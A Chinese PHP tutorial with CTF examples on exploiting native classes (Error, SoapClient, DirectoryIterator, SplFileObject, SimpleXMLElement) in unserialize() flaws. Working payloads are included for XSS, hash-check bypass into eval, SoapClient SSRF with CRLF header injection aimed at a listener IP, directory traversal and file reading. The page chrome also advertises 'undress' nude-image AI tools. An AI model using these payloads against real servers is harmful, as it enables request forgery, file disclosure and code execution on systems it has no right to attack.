亚洲国产日韩欧美一区二区三区,精品亚洲国产成人av在线,国产99视频精品免视看7,99国产精品久久久久久久成人热,欧美日韩亚洲国产综合乱

目錄
淺析php反序列化原生類的利用
一、常見魔術(shù)方法
二、原生類中的魔術(shù)方法
三、一些常見原生類的利用
Error/Exception
XSS
hash繞過
SoapClient
SSRF
DirectoryIterator/FilesystemIterator
目錄遍歷
SplFileObject
文件讀取
SimpleXMLElement
XXE
ReflectionMethod
獲取注釋內(nèi)容
首頁 后端開發(fā) php教程 深入了解PHP反序列化原生類

深入了解PHP反序列化原生類

May 17, 2022 am 11:56 AM
php

本篇文章給大家?guī)砹岁P(guān)于PHP的相關(guān)知識,其中主要介紹了關(guān)于反序列化原生類的利用,如果在代碼審計或者ctf中,有反序列化的功能點,但是卻不能構(gòu)造出完整的pop鏈,那這時我們應(yīng)該如何破局呢,下面一起來看一下,希望對大家有幫助。

深入了解PHP反序列化原生類

推薦學(xué)習(xí):《PHP視頻教程

淺析php反序列化原生類的利用

如果在代碼審計或者ctf中,有反序列化的功能點,但是卻不能構(gòu)造出完整的pop鏈,那這時我們應(yīng)該如何破局呢?我們可以嘗試一下從php原生類下手,php有些原生類中內(nèi)置一些魔術(shù)方法,如果我們巧妙構(gòu)造可控參數(shù),觸發(fā)并利用其內(nèi)置魔術(shù)方法,就有可能達到一些我們想要的目的。

一、常見魔術(shù)方法

__wakeup()?//執(zhí)行unserialize()時,先會調(diào)用這個函數(shù)
__sleep()?//執(zhí)行serialize()時,先會調(diào)用這個函數(shù)
__destruct()?//對象被銷毀時觸發(fā)
__call()?//在對象上下文中調(diào)用不可訪問的方法時觸發(fā)
__callStatic()?//在靜態(tài)上下文中調(diào)用不可訪問的方法時觸發(fā)
__get()?//用于從不可訪問的屬性讀取數(shù)據(jù)或者不存在這個鍵都會調(diào)用此方法
__set()?//用于將數(shù)據(jù)寫入不可訪問的屬性
__isset()?//在不可訪問的屬性上調(diào)用isset()或empty()觸發(fā)
__unset()?//在不可訪問的屬性上使用unset()時觸發(fā)
__toString()?//把對象當(dāng)作字符串使用時觸發(fā)
__invoke()?//當(dāng)嘗試將對象調(diào)用為函數(shù)時觸發(fā)

二、原生類中的魔術(shù)方法

我們采用下面腳本遍歷一下所有原生類中的魔術(shù)方法

<?php$classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            &#39;__destruct&#39;,
            &#39;__toString&#39;,
            &#39;__wakeup&#39;,
            &#39;__call&#39;,
            &#39;__callStatic&#39;,
            &#39;__get&#39;,
            &#39;__set&#39;,
            &#39;__isset&#39;,
            &#39;__unset&#39;,
            &#39;__invoke&#39;,
            &#39;__set_state&#39;
        ))) {
            print $class . &#39;::&#39; . $method . "\n";
        }
    }}

三、一些常見原生類的利用

Error/Exception

Error 是所有PHP內(nèi)部錯誤類的基類。 (PHP 7, 8)

**Error::__toString ** error 的字符串表達

返回 Error 的 string表達形式。

Exception是所有用戶級異常的基類。 (PHP 5, 7, 8)

**Exception::__toString ** 將異常對象轉(zhuǎn)換為字符串

返回轉(zhuǎn)換為字符串(string)類型的異常。

類屬性

  • message 錯誤消息內(nèi)容

  • code 錯誤代碼

  • file 拋出錯誤的文件名

  • line 拋出錯誤的行數(shù)

XSS

__toString方法會返回錯誤或異常的字符串形式,其中包含我們輸入的參數(shù),如果我們構(gòu)造一串xss代碼,結(jié)合echo渲染,將觸發(fā)反射形xss漏洞

示例:

<?php$a = unserialize($_GET[&#39;a&#39;]);echo $a;

POC:

<?php$a = new Error("<script>alert('xss')</script>");$b?=?serialize($a);echo?urlencode($b);

image-20220327114659883

hash繞過

先看一道題

[2020 極客大挑戰(zhàn)]Greatphp

<?phperror_reporting(0);class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
???????????if(!preg_match("/\<\?php|\(|\)|\"|\&#39;/", $this->syc,?$match)){
???????????????eval($this->syc);
???????????}?else?{
???????????????die("Try?Hard?!!");
???????????}

????????}
????}}if?(isset($_GET['great'])){
????unserialize($_GET['great']);}?else?{
????highlight_file(__FILE__);}

需要繞過兩個hash強比較,且最終需要構(gòu)造eval代碼執(zhí)行

顯然正常方法是行不通的,而通過原生類可進行繞過

同樣,當(dāng)md5()和sha1()函數(shù)處理對象時,會自動調(diào)用__tostring方法

先簡單看一下其輸出

<?php$a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo?$b."<br>";
echo?$c."<br>";
echo?$d;

image-20220322205917541

可以發(fā)現(xiàn),這兩個原生類返回的信息除了行號一模一樣,利用這點,我們可以嘗試進行hash函數(shù)的繞過,需要注意的是,必須將兩個傳入的對象放到同一行

因此我們可以進行簡單的測試,發(fā)現(xiàn)使用此方法可以繞過hash強(弱)函數(shù)比較

<?php$a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
    echo &#39;$a不等于$b&#39;."\n";}if (md5($a)===md5($b)){
    echo "md5值相等\n";}if (sha1($a)===sha1($b)){
    echo "sha1值相等";}

image-20220324195852488

根據(jù)這些知識點,我們可以輕松構(gòu)造payload

  <?phpclass SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
		???if(!preg_match("/\<\?php|\(|\)|\"|\&#39;/", $this->syc,?$match)){
			???eval($this->syc);
		???}?else?{
			???die("Try?Hard?!!");
		???}
		???
		}
	}}$str?=?"?><?=include~".urldecode("%D0%99%93%9E%98")."?>";//兩次取反繞過正則$a=new?Error($str,1);
	$b=new?Error($str,2);
	$c?=?new?SYCLOVER();$c->syc?=?$a;$c->lover?=?$b;
	echo(urlencode(serialize($c)));?>

SoapClient

SoapClient是一個專門用來訪問web服務(wù)的類,可以提供一個基于SOAP協(xié)議訪問Web服務(wù)的 PHP 客戶端,可以創(chuàng)建soap數(shù)據(jù)報文,與wsdl接口進行交互

soap擴展模塊默認關(guān)閉,使用時需手動開啟

SoapClient::__call —調(diào)用 SOAP 函數(shù) (PHP 5, 7, 8)

通常,SOAP 函數(shù)可以作為SoapClient對象的方法調(diào)用

SSRF

構(gòu)造函數(shù):

public?SoapClient?::?SoapClient(mixed?$wsdl?[,array?$options?])
第一個參數(shù)是用來指明是否是wsdl模式,如果為`null`,那就是非wsdl模式。
第二個參數(shù)為一個數(shù)組,如果在wsdl模式下,此參數(shù)可選;如果在非wsdl模式下,則必須設(shè)置location和uri選項,其中l(wèi)ocation是要將請求發(fā)送到的SOAP服務(wù)器的URL,而uri?是SOAP服務(wù)的目標(biāo)命名空間。

什么是soap

SOAP?是基于?XML?的簡易協(xié)議,是用在分散或分布的環(huán)境中交換信息的簡單的協(xié)議,可使應(yīng)用程序在?HTTP?之上進行信息交換
SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL?用來描述如何訪問具體的接口,?UDDI用來管理,分發(fā),查詢webService?,SOAP(簡單對象訪問協(xié)議)是連接或Web服務(wù)或客戶端和Web服務(wù)之間的接口。
其采用HTTP作為底層通訊協(xié)議,XML作為數(shù)據(jù)傳送的格式。

我們構(gòu)造一個利用payload,第一個參數(shù)為NULL,第二個參數(shù)的location設(shè)置為vps地址

<?php
$a = new SoapClient(null, array(
&#39;location&#39; =>?'http://47.102.146.95:2333',?
'uri'?=>'uri',
'user_agent'=>'111111'));
$b?=?serialize($a);
echo?$b;
$c?=?unserialize($b);
$c->a();

監(jiān)聽vps的2333端口,如下圖所示成功觸發(fā)SSRF,vps收到了請求信息

且可以看到SOAPAction和user_agent都可控

image-20220326202151356

本地測試時發(fā)現(xiàn),當(dāng)使用此內(nèi)置類(即soap協(xié)議)請求存在服務(wù)的端口時,會立即報錯,而去訪問不存在服務(wù)(未占用)的端口時,會等待一段時間報錯,可以以此進行內(nèi)網(wǎng)資產(chǎn)的探測。

如果配合CRLF漏洞,還可以可通過 SoapClient 來控制其他參數(shù)或者post發(fā)送數(shù)據(jù)。例如:HTTP協(xié)議去攻擊Redis

CRLF知識擴展

HTTP報文的結(jié)構(gòu):狀態(tài)行和首部中的每行以CRLF結(jié)束,首部與主體之間由一空行分隔。
CRLF注入漏洞,是因為Web應(yīng)用沒有對用戶輸入做嚴格驗證,導(dǎo)致攻擊者可以輸入一些惡意字符。
攻擊者一旦向請求行或首部中的字段注入惡意的CRLF(\r\n),就能注入一些首部字段或報文主體,并在響應(yīng)中輸出。

通過結(jié)合CRLF,我們利用SoapClient+CRLF便可以干更多的事情,例如插入自定義Cookie,

<?php$a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nCookie:?PHPSESSION=dasdasd564d6as4d6a"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

image-20220326204543138

發(fā)送POST的數(shù)據(jù)包,這里需要將Content-Type設(shè)置為application/x-www-form-urlencoded,我們可以通過添加兩個\r\n來將原來的Content-Type擠下去,自定義一個新的Content-Type

<?php$a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nContent-Type:?application/x-www-form-urlencoded\r\nX-Forwarded-For:?127.0.0.1\r\nCookie:?PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length:?10\r\n\r\npostdata"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

image-20220326205821109

看一道ctfshow上的題,完美利用上述知識點

$xff?=?explode(',',?$_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip?=?array_pop($xff);?//獲取xff頭


if($ip!=='127.0.0.1'){
????die('error');
}else{
????$token?=?$_POST['token'];
????if($token=='ctfshow'){
????????file_put_contents('flag.txt',$flag);
????}
}

poc:

<?php
$target = &#39;http://127.0.0.1/flag.php&#39;;
$post_string = &#39;token=ctfshow&#39;;
$b = new SoapClient(null,array(&#39;location&#39; =>?$target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type:?application/x-www-form-urlencoded'.'^^Content-Length:?'.(string)strlen($post_string).'^^^^'.$post_string,'uri'=>?"ssrf"));
$a?=?serialize($b);
$a?=?str_replace('^^',"\r\n",$a);
echo?urlencode($a);
?>

DirectoryIterator/FilesystemIterator

DirectoryIterator類提供了一個簡單的接口來查看文件系統(tǒng)目錄的內(nèi)容。

DirectoryIterator::__toString 獲取字符串形式的文件名 (PHP 5,7,8)

目錄遍歷

使用此內(nèi)置類的__toString方法結(jié)合glob或file協(xié)議,即可實現(xiàn)目錄遍歷

例如:

<?php
$a?=?new?DirectoryIterator("glob:///*");
foreach?($a?as?$b){
????echo?$b.'<br>';
}

FilesystemIterator繼承于DirectoryIterator,兩者作用和用法基本相同,區(qū)別為FilesystemIterator會顯示文件的完整路徑,而DirectoryIterator只顯示文件名

image-20220329185934148

因為可以配合使用glob偽協(xié)議(查找匹配的文件路徑模式),所以可以繞過open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny來禁止一些類的反序列化,很不幸的是這兩個原生類都在禁止名單當(dāng)中

SplFileObject

SplFileObject 類為單個文件的信息提供了一個面向?qū)ο蟮母呒壗涌?/p>

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件讀取

SplFileObject::__toString — 以字符串形式返回文件的路徑

<?phphighlight_file(__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
    echo($a);
}*/

如果沒有遍歷的話只能讀取第一行,且受到open_basedir影響

SimpleXMLElement

解析XML 文檔中的元素。 (PHP 5、PHP 7、PHP 8)

SimpleXMLElement::__construct — 創(chuàng)建一個新的 SimpleXMLElement 對象

XXE

我們查看一下其參數(shù):

image-20220324204259723

根據(jù)官方文檔,發(fā)現(xiàn)當(dāng)?shù)谌齻€參數(shù)為True時,即可實現(xiàn)遠程xml文件載入,第二個參數(shù)的常量值設(shè)置為2即可。

利用可參考賽題:[SUCTF 2018]Homework

ReflectionMethod

獲取注釋內(nèi)容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 獲取注釋內(nèi)容
由該原生類中的getDocComment方法可以訪問到注釋的內(nèi)容

image-20220331175819047

同時可利用的原生類還有ZipArchive– 刪除文件等等,不在敘述

推薦學(xué)習(xí):《PHP視頻教程

以上是深入了解PHP反序列化原生類的詳細內(nèi)容。更多信息請關(guān)注PHP中文網(wǎng)其他相關(guān)文章!

本站聲明
本文內(nèi)容由網(wǎng)友自發(fā)貢獻,版權(quán)歸原作者所有,本站不承擔(dān)相應(yīng)法律責(zé)任。如您發(fā)現(xiàn)有涉嫌抄襲侵權(quán)的內(nèi)容,請聯(lián)系admin@php.cn

熱AI工具

Undress AI Tool

Undress AI Tool

免費脫衣服圖片

Undresser.AI Undress

Undresser.AI Undress

人工智能驅(qū)動的應(yīng)用程序,用于創(chuàng)建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用于從照片中去除衣服的在線人工智能工具。

Clothoff.io

Clothoff.io

AI脫衣機

Video Face Swap

Video Face Swap

使用我們完全免費的人工智能換臉工具輕松在任何視頻中換臉!

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的代碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

功能強大的PHP集成開發(fā)環(huán)境

Dreamweaver CS6

Dreamweaver CS6

視覺化網(wǎng)頁開發(fā)工具

SublimeText3 Mac版

SublimeText3 Mac版

神級代碼編輯軟件(SublimeText3)

熱門話題

Laravel 教程
1597
29
PHP教程
1488
72
如何用PHP搭建社交分享功能 PHP分享接口集成實戰(zhàn) 如何用PHP搭建社交分享功能 PHP分享接口集成實戰(zhàn) Jul 25, 2025 pm 08:51 PM

在PHP中搭建社交分享功能的核心方法是通過動態(tài)生成符合各平臺要求的分享鏈接。1.首先獲取當(dāng)前頁面或指定的URL及文章信息;2.使用urlencode對參數(shù)進行編碼;3.根據(jù)各平臺協(xié)議拼接生成分享鏈接;4.在前端展示鏈接供用戶點擊分享;5.動態(tài)生成頁面OG標(biāo)簽優(yōu)化分享內(nèi)容展示;6.務(wù)必對用戶輸入進行轉(zhuǎn)義以防止XSS攻擊。該方法無需復(fù)雜認證,維護成本低,適用于大多數(shù)內(nèi)容分享需求。

PHP調(diào)用AI智能語音助手 PHP語音交互系統(tǒng)搭建 PHP調(diào)用AI智能語音助手 PHP語音交互系統(tǒng)搭建 Jul 25, 2025 pm 08:45 PM

用戶語音輸入通過前端JavaScript的MediaRecorderAPI捕獲并發(fā)送至PHP后端;2.PHP將音頻保存為臨時文件后調(diào)用STTAPI(如Google或百度語音識別)轉(zhuǎn)換為文本;3.PHP將文本發(fā)送至AI服務(wù)(如OpenAIGPT)獲取智能回復(fù);4.PHP再調(diào)用TTSAPI(如百度或Google語音合成)將回復(fù)轉(zhuǎn)為語音文件;5.PHP將語音文件流式返回前端播放,完成交互。整個流程由PHP主導(dǎo)數(shù)據(jù)流轉(zhuǎn)與錯誤處理,確保各環(huán)節(jié)無縫銜接。

如何用PHP結(jié)合AI實現(xiàn)文本糾錯 PHP語法檢測與優(yōu)化 如何用PHP結(jié)合AI實現(xiàn)文本糾錯 PHP語法檢測與優(yōu)化 Jul 25, 2025 pm 08:57 PM

要實現(xiàn)PHP結(jié)合AI進行文本糾錯與語法優(yōu)化,需按以下步驟操作:1.選擇適合的AI模型或API,如百度、騰訊API或開源NLP庫;2.通過PHP的curl或Guzzle調(diào)用API并處理返回結(jié)果;3.在應(yīng)用中展示糾錯信息并允許用戶選擇是否采納;4.使用php-l和PHP_CodeSniffer進行語法檢測與代碼優(yōu)化;5.持續(xù)收集反饋并更新模型或規(guī)則以提升效果。選擇AIAPI時應(yīng)重點評估準確率、響應(yīng)速度、價格及對PHP的支持。代碼優(yōu)化應(yīng)遵循PSR規(guī)范、合理使用緩存、避免循環(huán)查詢、定期審查代碼,并借助X

PHP打造博客評論系統(tǒng)變現(xiàn) PHP評論審核與防刷策略 PHP打造博客評論系統(tǒng)變現(xiàn) PHP評論審核與防刷策略 Jul 25, 2025 pm 08:27 PM

1.評論系統(tǒng)商業(yè)價值最大化需結(jié)合原生廣告精準投放、用戶付費增值服務(wù)(如上傳圖片、評論置頂)、基于評論質(zhì)量的影響力激勵機制及合規(guī)匿名數(shù)據(jù)洞察變現(xiàn);2.審核策略應(yīng)采用前置審核 動態(tài)關(guān)鍵詞過濾 用戶舉報機制組合,輔以評論質(zhì)量評分實現(xiàn)內(nèi)容分級曝光;3.防刷需構(gòu)建多層防御:reCAPTCHAv3無感驗證、Honeypot蜜罐字段識別機器人、IP與時間戳頻率限制阻止灌水、內(nèi)容模式識別標(biāo)記可疑評論,持續(xù)迭代應(yīng)對攻擊。

PHP實現(xiàn)商品庫存管理變現(xiàn) PHP庫存同步與報警機制 PHP實現(xiàn)商品庫存管理變現(xiàn) PHP庫存同步與報警機制 Jul 25, 2025 pm 08:30 PM

PHP通過數(shù)據(jù)庫事務(wù)與FORUPDATE行鎖確保庫存扣減原子性,防止高并發(fā)超賣;2.多平臺庫存一致性需依賴中心化管理與事件驅(qū)動同步,結(jié)合API/Webhook通知及消息隊列保障數(shù)據(jù)可靠傳遞;3.報警機制應(yīng)分場景設(shè)置低庫存、零/負庫存、滯銷、補貨周期和異常波動策略,并按緊急程度選擇釘釘、短信或郵件通知責(zé)任人,且報警信息需完整明確,以實現(xiàn)業(yè)務(wù)適配與快速響應(yīng)。

如何用PHP結(jié)合AI做圖像生成 PHP自動生成藝術(shù)作品 如何用PHP結(jié)合AI做圖像生成 PHP自動生成藝術(shù)作品 Jul 25, 2025 pm 07:21 PM

PHP不直接進行AI圖像處理,而是通過API集成,因為它擅長Web開發(fā)而非計算密集型任務(wù),API集成能實現(xiàn)專業(yè)分工、降低成本、提升效率;2.整合關(guān)鍵技術(shù)包括使用Guzzle或cURL發(fā)送HTTP請求、JSON數(shù)據(jù)編解碼、API密鑰安全認證、異步隊列處理耗時任務(wù)、健壯錯誤處理與重試機制、圖像存儲與展示;3.常見挑戰(zhàn)有API成本失控、生成結(jié)果不可控、用戶體驗差、安全風(fēng)險和數(shù)據(jù)管理難,應(yīng)對策略分別為設(shè)置用戶配額與緩存、提供prompt指導(dǎo)與多圖選擇、異步通知與進度提示、密鑰環(huán)境變量存儲與內(nèi)容審核、云存

超越燈堆:PHP在現(xiàn)代企業(yè)體系結(jié)構(gòu)中的作用 超越燈堆:PHP在現(xiàn)代企業(yè)體系結(jié)構(gòu)中的作用 Jul 27, 2025 am 04:31 AM

PHPisstillrelevantinmodernenterpriseenvironments.1.ModernPHP(7.xand8.x)offersperformancegains,stricttyping,JITcompilation,andmodernsyntax,makingitsuitableforlarge-scaleapplications.2.PHPintegrateseffectivelyinhybridarchitectures,servingasanAPIgateway

PHP集成AI語音識別與轉(zhuǎn)寫 PHP會議記錄自動生成方案 PHP集成AI語音識別與轉(zhuǎn)寫 PHP會議記錄自動生成方案 Jul 25, 2025 pm 07:06 PM

選擇合適AI語音識別服務(wù)并集成PHPSDK;2.用PHP調(diào)用ffmpeg將錄音轉(zhuǎn)為API要求格式(如wav);3.上傳文件至云存儲并調(diào)用API異步識別;4.解析JSON結(jié)果并用NLP技術(shù)整理文本;5.生成Word或Markdown文檔完成會議記錄自動化,全過程需確保數(shù)據(jù)加密、訪問控制與合規(guī)性以保障隱私安全。

See all articles